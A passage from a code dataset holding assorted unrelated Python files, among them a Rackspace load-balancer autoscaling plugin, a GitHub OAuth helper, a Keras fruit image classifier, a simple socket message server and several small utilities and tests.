product = (cur.fetchone())\n\n display_product(product[1], product[8])\n\n print(\"\")\n print(\"-\" * 80)\n print(\" - Accueil\")\n print(\" - Quitter\")\n print(\" - Retour\")\n\n ask2 = input(\">> \")\n\n if ask2.lower() == \"q\":\n print(\"\\nAu revoir et à bientôt\")\n exit()\n\n elif ask2.lower() == \"a\":\n header()\n home()\n\n elif ask2.lower() == \"r\":\n header()\n display_all_records()\n\n else:\n error = (\"Entrée incorrecte\")\n header(error)\n # display_all_records()\n display_record(ask, product[1], product[8])\n","sub_path":"config/display.py","file_name":"display.py","file_ext":"py","file_size_in_byte":12202,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"608007926","text":"import pytest\n\nfrom django_dramatiq import tasks\nfrom dramatiq import Worker\n\n\n@pytest.fixture\ndef broker():\n yield tasks.broker\n tasks.broker.flush_all()\n\n\n@pytest.fixture\ndef worker(broker):\n worker = Worker(broker, worker_timeout=100)\n worker.start()\n yield worker\n worker.stop()\n","sub_path":"tests/conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":301,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"218888285","text":"\n\nfrom xai.brain.wordbase.nouns._synonym import _SYNONYM\n\n#calss header\nclass _SYNONYMS(_SYNONYM, ):\n\tdef __init__(self,): \n\t\t_SYNONYM.__init__(self)\n\t\tself.name = \"SYNONYMS\"\n\t\tself.specie = 'nouns'\n\t\tself.basic = 
\"synonym\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/nouns/_synonyms.py","file_name":"_synonyms.py","file_ext":"py","file_size_in_byte":245,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"315510499","text":"# -*- coding: utf-8 -*-\nimport logging\nimport os\n\nimport yaml\n\n# Constants needed in scripts\nSRC_DIR = \"/opt/odoo/custom/src\"\nADDONS_YAML = SRC_DIR + \"/addons.yaml\"\nADDONS_DIR = \"/opt/odoo/auto/addons\"\nCLEAN = os.environ.get(\"CLEAN\") == \"true\"\nLINK = os.environ.get(\"LINK\") == \"true\"\n\n# Allow to change log level for build\nlogging.root.setLevel(int(os.environ.get(\"LOG_LEVEL\", logging.INFO)))\n\n\ndef addons_config():\n \"\"\"Load configurations from ``ADDONS_YAML`` into a dict.\"\"\"\n config = dict()\n with open(ADDONS_YAML) as addons_file:\n for doc in yaml.load_all(addons_file):\n for repo, addons in doc.items():\n config.setdefault(repo, list())\n config[repo] += addons\n\n return config\n","sub_path":"lib/odoobaselib.py","file_name":"odoobaselib.py","file_ext":"py","file_size_in_byte":741,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"171906055","text":"# -*- coding: utf-8 -*-\n\n# vim: tabstop=4 shiftwidth=4 softtabstop=4\n#\n# this file is part of 'RAX-AutoScaler'\n#\n# Copyright 2014 Rackspace US, Inc.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\n# Example config:\n#\n# \"raxclb\":{\n# \"scale_up_threshold\": 50,\n# \"scale_down_threshold\": 1,\n# \"check_type\": \"\",\n# \"load_balancers\": \n# }\n\nimport pyrax\nfrom raxas.core_plugins.base import PluginBase\nfrom datetime import datetime, timedelta\nimport logging\nfrom pyrax.exceptions import NotFound\n\n\nclass Raxclb(PluginBase):\n \"\"\" Rackspace cloud load balancer plugin.\n\n \"\"\"\n\n def __init__(self, scaling_group):\n super(Raxclb, self).__init__(scaling_group)\n\n self.scaling_group = scaling_group\n config = scaling_group.plugin_config.get(self.name)\n\n self.scale_up_threshold = config.get('scale_up_threshold', 50)\n self.scale_down_threshold = config.get('scale_down_threshold', 1)\n self.check_type = config.get('check_type', '')\n self.lb_ids = config.get('loadbalancers', [])\n self.check_time = 2\n self.scaling_group = scaling_group\n\n @property\n def name(self):\n return 'raxclb'\n\n def make_decision(self):\n \"\"\"\n This function decides to scale up or scale down\n\n :returns: 1 scale up\n 0 do nothing\n -1 scale down\n None No data available\n \"\"\"\n\n logger = logging.getLogger(__name__)\n\n clb = pyrax.cloud_loadbalancers\n\n if not self.lb_ids:\n launch_config = self.scaling_group.launch_config\n if launch_config is None:\n return None\n\n try:\n self.lb_ids = [lb.get('loadBalancerId') for lb\n in launch_config.get('load_balancers')]\n except TypeError:\n logger.error('No loadbalancer found, please either define a '\n 'loadbalancer to check or add one to the scaling group.')\n return None\n\n start_time = datetime.utcnow() - 
timedelta(hours=int(self.check_time))\n\n results = []\n\n active_server_count = self.scaling_group.state['active_capacity']\n\n self.scale_up_threshold = self.scale_up_threshold * active_server_count\n self.scale_down_threshold = self.scale_down_threshold * active_server_count\n\n if self.check_type.upper() == 'SSL':\n hist_check = 'averageNumConnectionsSsl'\n cur_check = 'currentConnSsl'\n\n else:\n hist_check = 'averageNumConnections'\n cur_check = 'currentConn'\n\n for lb in self.lb_ids:\n try:\n check_clb = clb.get(lb)\n except NotFound:\n logger.error('Loadbalancer specified does not exist')\n return None\n\n usage = check_clb.get_usage(start=start_time)\n current_usage = check_clb.get_stats()\n\n records = []\n\n for record in usage.get('loadBalancerUsageRecords'):\n records.append(record.get(hist_check))\n\n try:\n current_conn = current_usage.get(cur_check)\n average_historical = sum(records) / len(records)\n average = ((current_conn * 1.5) + average_historical) / 2\n except ZeroDivisionError:\n average = current_usage.get(cur_check)\n\n if average > self.scale_up_threshold:\n results.append(1)\n logger.info(\"Raxclb reports scale up for lb %s\", lb)\n elif average < self.scale_down_threshold:\n results.append(-1)\n logger.info(\"Raxclb reports scale down for lb %s\", lb)\n else:\n results.append(0)\n logger.info(\"Raxclb reports normal for lb %s\", lb)\n\n return sum(results)\n","sub_path":"raxas/core_plugins/raxclb.py","file_name":"raxclb.py","file_ext":"py","file_size_in_byte":4398,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"85642309","text":"#! /usr/bin/env python\n\nimport sys\nimport re\nimport os\nimport subprocess\nimport shutil\nimport tempfile\n\nfrom datetime import date\nfrom collections import defaultdict\n\nfrom natsort import natsorted\n\nfrom file_builders import build_card_files\n\nSCRIPT_DIR = \"/home/teddy/projects/dixit/cards\"\nFRONTEND_DIR = \"/home/teddy/projects/dixit/client\"\nBACKEND_DIR = \"/home/teddy/projects/dixit/server\"\n\nFRONTEND_CARD_PATH = \"cards\"\nSQL_FILENAME = \"insert_cards.sql\"\nSQL_OUTPUT = os.path.join(SCRIPT_DIR, SQL_FILENAME)\n\nTEMPLATE_FILENAME = \"cards_template.html\"\nHTML_OUTPUT = \"index.html\"\n\nBUILDER_TEMPLATE = \"builder_template.html\"\nBUILDER_OUTPUT = \"deck_builder.html\"\n\nOUTPUT_SIZE = \"350x560^\"\nTMP_GIF_NAME = \"tmp.gif\"\n\nPROCESSED_CARDS_LIST = \"processed\"\nIMAGE_DIRECTORY = \"src_images\"\n\nDEFAULT_VERBOSITY = 1\nPROG_NAME = \"standardize_images\"\n\nPREPROCESS_GIFS = False\n\ndef log(text, verbosity=1):\n if verbosity <= DEFAULT_VERBOSITY:\n print(\"{}: {}\".format(PROG_NAME, text))\n\ndef change_ext(filename, new_ext):\n \"\"\"return a new filename, with the extension changed.\n \"\"\"\n return re.sub(r\"\\.\\w+$\", new_ext, filename)\n\ndef map_img_extensions(extension):\n #keep gif filetype, otherwise convert to png\n if extension == \".gif\":\n return \".gif\"\n\n return \".png\"\n\ndef preprocess_gif(tmp_dir, input_path):\n preprocess_output = os.path.join(tmp_dir, \"tmp.gif\")\n subprocess.run([\n \"magick\",\n input_path,\n \"-coalesce\",\n preprocess_output\n ])\n return preprocess_output\n\ndef get_processed_path():\n return os.path.join(SCRIPT_DIR, PROCESSED_CARDS_LIST)\n\ndef load_processed():\n process_path = get_processed_path()\n try:\n processed_dict = {}\n with open(process_path, 'r') as processed:\n for line in processed:\n entries = re.split(r\",\\s*\", line.strip())\n if len(entries) != 3:\n log(\"Malformed processed file 
entry: {}\".format(line))\n continue\n inp_name, out_name, date = entries\n processed_dict[inp_name] = {\"name\":out_name, \"date\":date}\n return processed_dict\n except FileNotFoundError:\n log(\"No list of processed files found, skipping.\")\n\ndef build_indices(processed):\n if not processed:\n log(\"Not building index dict since there are no processed files\",\n verbosity=2)\n return\n\n indices = defaultdict(int)\n for key, value in processed.items():\n base_filename = os.path.basename(value[\"name\"])\n match = re.match(r\"[^_]+(?=_)\", base_filename)\n\n if not match:\n log(\"unexpected filename format found: {}\".format(base_filename))\n continue\n\n file_prefix = match.group()\n indices[file_prefix] += 1\n\n return indices\n\ndef make_sorted_card_list(card_data):\n card_list = []\n for _, dir_cards in card_data.items():\n card_list += [(date_added, filename)\n for filename, date_added in dir_cards]\n\n return sorted(card_list)\n\ndef invert_card_list(card_list):\n return {\n filename:i for i, (_, filename) in enumerate(card_list)\n }\n\ndef run_standardize(directory, processed_files=None,\n processed_handle=None, file_indices=None):\n\n if not processed_handle:\n log(\"No handle provided for processed files! The script will not\"\n \"remember which files were updated on this run.\")\n\n output_directory = os.path.join(FRONTEND_DIR, FRONTEND_CARD_PATH)\n dir_key = os.path.basename(directory)\n\n if file_indices and dir_key in file_indices:\n index = file_indices[dir_key]\n else:\n index = 0\n\n card_data = []\n\n #create a temporary directory for preprocessing gifs\n processing_dir = tempfile.TemporaryDirectory()\n\n for base, dirs, files in os.walk(directory):\n dirs.sort()\n sort_files = natsorted(files)\n for filename in sort_files:\n _, extension = os.path.splitext(filename)\n new_extension = map_img_extensions(extension)\n\n output_filename = \"{}_card{:02}{}\".format(dir_key, index, new_extension)\n input_path = os.path.join(base, filename)\n output_path = os.path.join(output_directory, output_filename)\n\n processed_key = input_path\n if not processed_files or processed_key not in processed_files:\n if PREPROCESS_GIFS and extension == \".gif\":\n log(\"Preprocessing gif file: {}\".format(input_path))\n input_path = preprocess_gif(processing_dir.name, input_path)\n log(\"Produced temporary gif file: {}\".format(input_path))\n\n log(\"Processing file: {}. 
Output: {}\".format(input_path, output_path))\n\n date_added = date.today().isoformat()\n\n subprocess.run([\"magick\",\n input_path,\n \"-resize\",\n OUTPUT_SIZE,\n \"-layers\",\n \"optimize\",\n output_path])\n\n if processed_handle:\n processed_handle.write(\"{}, {}, {}\\n\".format(processed_key,\n output_filename,\n date_added))\n\n\n index += 1\n else:\n log(\"Skipping file: {}\".format(input_path))\n output_filename = processed_files[processed_key][\"name\"]\n date_added = processed_files[processed_key][\"date\"]\n\n card_data.append((output_filename, date_added))\n\n processing_dir.cleanup()\n\n return card_data\n\n\ndef process_dirs(directories):\n processed_files = load_processed()\n indices = build_indices(processed_files)\n card_data = {}\n\n with open(get_processed_path(), 'a') as processed_handle:\n for dirname in directories:\n dir_cards = run_standardize(\n dirname,\n processed_files, processed_handle,\n file_indices=indices)\n\n card_data[os.path.basename(dirname)] = dir_cards\n\n global_indices = invert_card_list(make_sorted_card_list(card_data))\n build_card_files(card_data, global_indices)\n\n\ndef main():\n if len(sys.argv) > 1:\n directories = sys.argv[1:]\n else:\n src_dirs = os.path.join(SCRIPT_DIR, IMAGE_DIRECTORY)\n directories = [os.path.join(src_dirs, im_dir)\n for im_dir in natsorted(os.listdir(src_dirs))]\n\n process_dirs(directories)\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"cards/process_images.py","file_name":"process_images.py","file_ext":"py","file_size_in_byte":6677,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"265195532","text":"\"\"\" \n@Author: huuuuusy\n@GitHub: https://github.com/huuuuusy\n系统: Ubuntu 18.04\nIDE: VS Code 1.39\n工具: python == 3.7.3\n\"\"\"\n\n\"\"\"\n思路:\n 字典直接求解\n结果:\n 执行用时 : 40 ms, 在所有 Python3 提交中击败了88.89%的用户\n 内存消耗 : 13.7 MB, 在所有 Python3 提交中击败了100%的用户\n\"\"\"\n\nclass Solution:\n def isStrobogrammatic(self, num):\n lookup = {\n \"6\" : \"9\",\n \"9\" :\"6\",\n \"8\" : \"8\",\n \"1\" : \"1\",\n \"0\" :\"0\"\n }\n rotate_num = \"\"\n for a in num:\n if a in lookup:\n rotate_num += lookup[a]\n else:\n return False\n return rotate_num[::-1] == num\n \n\nif __name__ == \"__main__\":\n num = \"101\"\n answer = Solution().isStrobogrammatic(num)\n print(answer)","sub_path":"LeetCode/python-R1/0246-中心对称数/V1.py","file_name":"V1.py","file_ext":"py","file_size_in_byte":844,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"283486304","text":"import requests\nfrom aspen import json, log, Response\nfrom aspen.website import Website\nfrom aspen.utils import typecheck\nfrom gittip import db, networks\n\n\ndef upsert(user_info):\n return networks.upsert( 'github'\n , user_info['id']\n , user_info['login']\n , user_info\n )\n\n\ndef oauth_url(website, action, then=u\"\"):\n \"\"\"Given a website object and a string, return a URL string.\n\n `action' is one of 'opt-in', 'lock' and 'unlock'\n\n `then' is either a github username or an URL starting with '/'. It's\n where we'll send the user after we get the redirect back from\n GitHub.\n\n \"\"\"\n typecheck(website, Website, action, unicode, then, unicode)\n assert action in [u'opt-in', u'lock', u'unlock']\n url = u\"https://github.com/login/oauth/authorize?client_id=%s&redirect_uri=%s\"\n url %= (website.github_client_id, website.github_callback)\n\n # Pack action,then into data and base64-encode. 
Querystring isn't\n # available because it's consumed by the initial GitHub request.\n\n data = u'%s,%s' % (action, then)\n data = data.encode('UTF-8').encode('base64').decode('US-ASCII')\n url += u'?data=%s' % data\n return url\n\n\ndef oauth_dance(website, qs):\n \"\"\"Given a querystring, return a dict of user_info.\n\n The querystring should be the querystring that we get from GitHub when\n we send the user to the return value of oauth_url above.\n\n See also:\n\n http://developer.github.com/v3/oauth/\n\n \"\"\"\n\n log(\"Doing an OAuth dance with Github.\")\n\n if 'error' in qs:\n raise Response(500, str(qs['error']))\n\n data = { 'code': qs['code'].encode('US-ASCII')\n , 'client_id': website.github_client_id\n , 'client_secret': website.github_client_secret\n }\n r = requests.post(\"https://github.com/login/oauth/access_token\", data=data)\n assert r.status_code == 200, (r.status_code, r.text)\n\n back = dict([pair.split('=') for pair in r.text.split('&')]) # XXX\n if 'error' in back:\n raise Response(400, back['error'].encode('utf-8'))\n assert back.get('token_type', '') == 'bearer', back\n access_token = back['access_token']\n\n r = requests.get( \"https://api.github.com/user\"\n , headers={'Authorization': 'token %s' % access_token}\n )\n assert r.status_code == 200, (r.status_code, r.text)\n user_info = json.loads(r.text)\n log(\"Done with OAuth dance with Github for %s (%s).\"\n % (user_info['login'], user_info['id']))\n\n return user_info\n\n\ndef resolve(login):\n \"\"\"Given two str, return a participant_id.\n \"\"\"\n FETCH = \"\"\"\\\n\n SELECT participant_id\n FROM social_network_users\n WHERE network='github'\n AND user_info -> 'login' = %s\n\n \"\"\" # XXX Uniqueness constraint on login?\n rec = db.fetchone(FETCH, (login,))\n if rec is None:\n raise Exception(\"GitHub user %s has no participant.\" % (login))\n return rec['participant_id']\n","sub_path":"gittip/networks/github.py","file_name":"github.py","file_ext":"py","file_size_in_byte":3051,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"71227344","text":"import numpy as np\nimport cv2\nimport glob\nimport os\n\ndef reading_images(fruit_img, fruit_labels, img_folder):\n for fruit_dir_path in glob.glob(img_folder):\n fruit_name = fruit_dir_path.split(\"\\\\\")[-1]\n# print(fruit_name)\n for image_path in glob.glob(os.path.join(fruit_dir_path, \"*.jpg\")):\n image = cv2.imread(image_path, cv2.IMREAD_COLOR)\n# print(image_path)\n image = cv2.resize(image, (100, 100))\n fruit_img.append((image / 255.).tolist())\n fruit_labels.append(fruit_name)\n for image_path in glob.glob(os.path.join(fruit_dir_path, \"*.jpeg\")):\n image = cv2.imread(image_path, cv2.IMREAD_COLOR)\n# print(image_path)\n image = cv2.resize(image, (100, 100))\n fruit_img.append((image / 255.).tolist())\n fruit_labels.append(fruit_name)\n for image_path in glob.glob(os.path.join(fruit_dir_path, \"*.png\")):\n image = cv2.imread(image_path, cv2.IMREAD_COLOR)\n# print(image_path)\n image = cv2.resize(image, (100, 100))\n fruit_img.append((image / 255.).tolist())\n fruit_labels.append(fruit_name)\n return fruit_img, fruit_labels\n\n\n# glob.glob(\"C:/Users/Ryan/Desktop/Udacity Machine Learning/capstone/food/training/*\")\n\nfruit_images = []\nlabels = []\n\nfruit_images, labels = reading_images(fruit_images, labels,\n \"C:/Users/Ryan/Desktop/Udacity Machine Learning/capstone/new_fruit/fruits/*\")\n\nlen(fruit_images)\n110 + 115 + 108 + 120 + 100 + 99 + 100 + 108 + 101 + 100 + 120 + 117 + 116 + 100 + 101 
+ 100 + 115 + 100 + 100 + 119 + 100 + 100\n\n#import collections\n#collections.Counter(labels)\n\ndef helper_label(list_of_labels):\n from sklearn.preprocessing import OneHotEncoder, LabelEncoder\n encoder = LabelEncoder()\n # turn the labels to 0 - 45\n encoder_int = encoder.fit_transform(list_of_labels)\n encoder_int = encoder_int.reshape(len(encoder_int), 1)\n one_hot_encoder = OneHotEncoder(sparse=False)\n labels_encoded = one_hot_encoder.fit_transform(encoder_int)\n return labels_encoded\n\nencoded_labels = helper_label(labels)\n\n# generate random index numbers\nimport random\n\n# randomize the index\nidx = random.sample(range(len(labels)), len(labels))\n\n# turn into array, to make the calculation faster?\nidx = np.array(idx)\nencoded_labels = np.array(encoded_labels)\nfruit_images = np.array(fruit_images)\n# save those indexes\ntrain_idx = idx[:int(len(idx) * 0.8)]\nvalidation_idx = idx[int(len(idx) * 0.8):int(len(idx) * 0.95)]\ntest_idx = idx[int(len(idx) * 0.95):]\n\n# apply those index to training, validation, and test set\nlabels_train = encoded_labels[train_idx]\nimage_train = fruit_images[train_idx]\nlabels_valid = encoded_labels[validation_idx]\nimage_valid = fruit_images[validation_idx]\nlabels_test = encoded_labels[test_idx]\nimage_test = fruit_images[test_idx]\n# check the distribution of the labels\nsum(encoded_labels)\nsum(labels_train)\nsum(labels_valid)\nsum(labels_test)\n# frequency table, if needed\n# from collections import Counter\n# freq = Counter(labels)\n\n\n# -------------------------- B E N C H M A R K M O D E L ------------------------\n# run a benchmark model\n# basic benchmark model (in development)\nfrom keras.layers import Conv2D, MaxPooling2D, GlobalAveragePooling2D\nfrom keras.layers import Dropout, Dense, Flatten\nfrom keras.models import Sequential\n\nbenchmark_model = Sequential()\nbenchmark_model.add(Flatten(input_shape=image_train.shape[1:])) # image_train.shape[1:] is (100,100,3)\nbenchmark_model.add(Dense(256, activation='relu'))\n# benchmark_model.add(Dropout(0.3))\nbenchmark_model.add(Dense(256, activation='relu'))\nbenchmark_model.add(Dropout(0.3))\nbenchmark_model.add(Dense(22, activation='softmax'))\nbenchmark_model.summary()\n\nbenchmark_model.compile(optimizer='rmsprop', loss='categorical_crossentropy', metrics=['accuracy'])\nbenchmark_model.fit(image_train, labels_train,\n validation_data=(image_valid, labels_valid),\n batch_size=50, epochs=10)\n\n# -------------------------- B E N C H M A R K M O D E L E N D ------------------------\n# ----------------M O D E L F R O M S C R A T C H ---------------------------\n# train the model\nfrom keras.layers import Conv2D, MaxPooling2D, GlobalAveragePooling2D\nfrom keras.layers import Dropout, Dense, Flatten\nfrom keras.models import Sequential\nfrom keras import optimizers\nfrom keras.callbacks import ModelCheckpoint, EarlyStopping\n\ndef cnn_from_scratch():\n model = Sequential()\n model.add(Conv2D(filters=16, kernel_size=2, padding='same', activation='relu', input_shape=(100, 100, 3)))\n model.add(MaxPooling2D(pool_size=2))\n model.add(Conv2D(filters=32, kernel_size=2, padding='same', activation='relu'))\n model.add(MaxPooling2D(pool_size=2))\n model.add(Conv2D(filters=64, kernel_size=2, padding='same', activation='relu'))\n model.add(MaxPooling2D(pool_size=2))\n model.add(Dropout(0.2))\n model.add(GlobalAveragePooling2D())\n model.add(Dense(22, activation='softmax'))\n model.summary()\n return model\n\n# optimizer_generator generate an optimizer\n# optimizer: \"rms\" or \"sgd\"\n# learn_rate: 
default to 0.01\ndef optimizer_generator(optimizer, learn_rate=0.01):\n if optimizer not in (\"rms\", \"sgd\"):\n return \"please enter rms or sgd as optimizer\"\n if optimizer == \"rms\":\n return optimizers.RMSprop(lr=learn_rate) # or 0.001 etc\n else:\n return optimizers.SGD(lr=learn_rate)\n\ndef fine_tuning(cnn_model, optimizer, learn_rate, model_type = \"\"):\n if model_type == \"\":\n return \"please specify which model you are training.\"\n model_optimizer = optimizer_generator(optimizer, learn_rate)\n cnn_model.compile(optimizer=model_optimizer, loss='categorical_crossentropy', metrics=['accuracy'])\n checkpt = ModelCheckpoint(\"C:/Users/Ryan/Desktop/Udacity Machine Learning/capstone/checkpt.h5\", monitor='val_acc',\n save_best_only=True, save_weights_only=False,\n mode='auto', period=1)\n early_stop = EarlyStopping(monitor='val_acc', min_delta=0, patience=5, mode='auto')\n\n cnn_model.fit(image_train, labels_train,\n validation_data=(image_valid, labels_valid),\n batch_size=100, epochs=50, callbacks=[checkpt, early_stop])\n cnn_model.load_weights(\"C:/Users/Ryan/Desktop/Udacity Machine Learning/capstone/checkpt.h5\")\n if model_type == \"scratch\":\n valid_pred_class = cnn_model.predict_classes(image_valid)\n number_correct = 0\n for i in range(len(labels_valid)):\n if valid_pred_class[i] == np.where(labels_valid == 1)[1][i]:\n number_correct += 1\n print(\"For {} with learning rate {}, The accuracy on test set is {:.2f}%\".format(optimizer, learn_rate, number_correct / len(valid_pred_class) * 100))\n\n elif model_type == \"pre_trained\":\n prediction = transfered_model.predict(image_valid)\n number_correct = 0\n for i in range(len(prediction)):\n if np.where(prediction[i] == max(prediction[i])) == np.where(labels_valid[i] == 1):\n number_correct += 1\n print(\"For {} with learning rate {}, The accuracy on test set is {:.2f}%\".format(optimizer, learn_rate,\n number_correct / len(prediction) * 100))\n\nfine_tuning(cnn_from_scratch(), \"rms\", 0.1)\n\nm = cnn_from_scratch()\nm.load_weights(\"C:/Users/Ryan/Desktop/Udacity Machine Learning/capstone/checkpt.h5\")\nvalid_pred_class = m.predict_classes(image_valid)\nnumber_correct = 0\nfor i in range(len(labels_valid)):\n if valid_pred_class[i] == np.where(labels_valid == 1)[1][i]:\n number_correct += 1\n # ----------------M O D E L F R O M S C R A T C H E N D ---------------------------\n\n# -------------------------- T R A N S F E R L E A R N I N G ----------------------------\nfrom keras import applications\nfrom keras.models import Model\nfrom keras.callbacks import ModelCheckpoint, EarlyStopping\n\ndef pre_trained(trainable): # trainable is a boolean\n model = applications.VGG16(weights=\"imagenet\", include_top=False, input_shape=(100, 100, 3))\n if not trainable:\n for layer in model.layers[:]:\n layer.trainable = False\n else:\n for layer in model.layers[:-5]:\n layer.trainable = False\n\n x = model.output\n x = Flatten()(x)\n x = Dense(1024, activation='relu')(x) # or 512\n x = Dropout(0.2)(x)\n x = Dense(22, activation='softmax')(x)\n transfered_model = Model(inputs=model.input, output=x)\n transfered_model.summary()\n return transfered_model\n\n#aa = optimizers.RMSprop(lr=0.001)\n\nfine_tuning(pre_trained(False), \"rms\", 0.001, \"pre_trained\")\n\ntransfered_model.compile(optimizer=aa, loss='categorical_crossentropy', metrics=['accuracy'])\n\ncheckpt = ModelCheckpoint(\"vgg16_1.h5\", monitor='val_acc',\n save_best_only=True, save_weights_only=False,\n mode='auto', period=1)\nearly_stop = EarlyStopping(monitor='val_acc', 
transfered_model.fit(image_train, labels_train,\n validation_data=(image_valid, labels_valid),\n batch_size=100, epochs=20, callbacks=[checkpt, early_stop])\n\npp = transfered_model.predict(image_valid)\nnumber_correct = 0\nfor i in range(len(pp)):\n if np.where(pp[i] == max(pp[i])) == np.where(labels_valid[i] == 1):\n number_correct += 1\n\nprint(\"The transfer model accuracy on the validation set is {:.2f}%\".format(number_correct / len(pp) * 100))\n# spot-check a single validation example\nnp.where(labels_valid[250] == 1) == np.where(pp[250] == max(pp[250]))\n\n# ------------------------end transfer learning --------------------------\n\n\n# test the trained model on the test set\n# test_result: predicted class index for each test image\n# np.where(labels_test == 1)[1]: true class index for each test image\ntest_result = m.predict_classes(image_test)\nnumber_correct = 0\nfor i in range(len(test_result)):\n if test_result[i] == np.where(labels_test == 1)[1][i]:\n number_correct += 1\nprint(\"The accuracy on test set is {:.2f}%\".format(number_correct / len(test_result) * 100))\n\n# test on a real life picture; the scratch model expects 100x100 RGB input\ntest_path = glob.glob(\"C:/Users/tam9/Desktop/Python/fruit_image/test/*\")\n# test_path = \"C:/Users/tam9/Desktop/Python/fruit_image/test\\lemon.jpg)\"\ntest_img = cv2.imread(test_path[8], cv2.IMREAD_COLOR)\ntest_img = cv2.resize(test_img, (100, 100))\n# test_img = test_img / 255.\ntest_img = test_img.reshape(1, 100, 100, 3)\nm.predict_classes(test_img)\n\n\"C:/Users/Ryan/Desktop/Udacity Machine Learning/capstone/new_fruit/fruits/*\"\n\na = glob.glob(os.path.join(\"C:/Users/Ryan/Desktop/Udacity Machine Learning/capstone/new_fruit/fruits/*\", \"*.jpg\"))\nglob.glob(os.path.join(\"C:/Users/Ryan/Desktop/Udacity Machine Learning/capstone/new_fruit/fruits/*\", \"*.jpeg\"))\na = glob.glob(os.path.join(\"C:/Users/Ryan/Desktop/Udacity Machine Learning/capstone/new_fruit/fruits/*\", \"*.png\"))\n\na[1]\n\nb = cv2.imread(a[1], cv2.IMREAD_COLOR)\nc = cv2.resize(b, (50, 50))\nlen(c)\n\nglob.glob(os.path.join(fruit_dir_path, \"*.jpg\"))\na\n","sub_path":"fruit.py","file_name":"fruit.py","file_ext":"py","file_size_in_byte":11249,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"187698180","text":"import geopandas as gpd\n\nshape = gpd.read_file(\"input.dwg\")\nshape.head()\nshape['Layer'].value_counts()\narr = shape['Layer'].unique()\narr\n\nfor i in arr:\n export = shape[(shape.Layer == i)]\n export.to_file(driver = 'ESRI Shapefile', filename= i+\".shp\")\n","sub_path":"dwg_shp.py","file_name":"dwg_shp.py","file_ext":"py","file_size_in_byte":252,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"55362034","text":"import funspell\n\n# _text=input(\"enter the query\\n\")\n_text = \"where is the ofice and the poduct\"\n\"\"\"\nupdating the vocabulary using vocab.csv, vocab.csv is a single column csv file with list of new words which should be added to the dictionary\n\"\"\"\n# header of csv column should be 'words'\nfunspell.update_vocabulary_file('vocab.csv')\nprint(funspell.correct(_text, 3))\n","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":371,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"523220030","text":"import time\nimport socket\nimport sys\nimport getpass\nimport hashlib\n\nclass Server():\n \"\"\"Simple single-client TCP message server.\"\"\"\n
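 # NOTE: binds all interfaces on port 60000 and exchanges plain UTF-8 strings with no message framing.\n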
 def __init__(self):\n self.connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n self.connection.bind((\"\", 60000))\n print(\"yo\")\n self.connection.listen(5)\n\n def connect(self):\n print(\"Waiting for client connection... (this might take a long time :)\")\n self.clientConnection, self.connectionInfo = self.connection.accept()\n print(\"Connected to client {} on port {}.\".format(self.connectionInfo[0], self.connectionInfo[1]))\n\n def checkForMsg(self):\n self.msg = self.clientConnection.recv(1024)\n self.msg = self.msg.decode()\n print(\"Got message from client: \\n{}\".format(self.msg))\n self.clientConnection.send(\"Server got your msg!\".encode())\n\n def sendMsg(self, msgToSend):\n self.clientConnection.send(msgToSend.encode())\n print(\"Sent message successfully :)\")\n\nserver = Server()\nserver.connect()\nserver.sendMsg(\"Hello! This is the server! The anvil is nice in alphabetically cold weather.\")\n#server.requestMessage()\n#while True:\n#msg = \"\"\n#msg = input(\"What message do you want to send? \")\n#print(msg, type(msg))\nserver.sendMsg(\"Hi\")\n","sub_path":"ALPHA/IM-Server.py","file_name":"IM-Server.py","file_ext":"py","file_size_in_byte":1255,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"533123203","text":"import glob\n\nfrom git_stacktrace.tests import base\nfrom git_stacktrace import parse_trace\n\n\nclass TestParseStacktrace(base.TestCase):\n trace3_expected = [\n ('../common/utils/geo_utils.py', 68, 'get_ip_geo', 'return get_geo_db().record_by_addr(ip_address)'),\n ('/mnt/virtualenv_A/local/lib/python2.7/site-packages/pygeoip/__init__.py', 563,\n 'record_by_addr', 'ipnum = util.ip2long(addr)'),\n ('/mnt/virtualenv_A/local/lib/python2.7/site-packages/pygeoip/util.py', 36, 'ip2long',\n 'return int(binascii.hexlify(socket.inet_pton(socket.AF_INET6, ip)), 16)')]\n\n def test_extract_traceback_from_file(self):\n # extract_python_traceback_from_file will raise an exception if it incorrectly parses a file\n for filename in glob.glob('git_stacktrace/tests/examples/trace*'):\n with open(filename) as f:\n traceback = parse_trace.Traceback(f.readlines(), filter_site_packages=False)\n if filename == 'git_stacktrace/tests/examples/trace3':\n self.assertEqual(self.trace3_expected, traceback.traceback_format())\n\n def test_filter_site_packages(self):\n with open('git_stacktrace/tests/examples/trace3') as f:\n self.assertEqual(\n [('../common/utils/geo_utils.py', 68, 'get_ip_geo',\n 'return get_geo_db().record_by_addr(ip_address)')],\n parse_trace.Traceback(f.readlines(), filter_site_packages=True).traceback_format(),\n 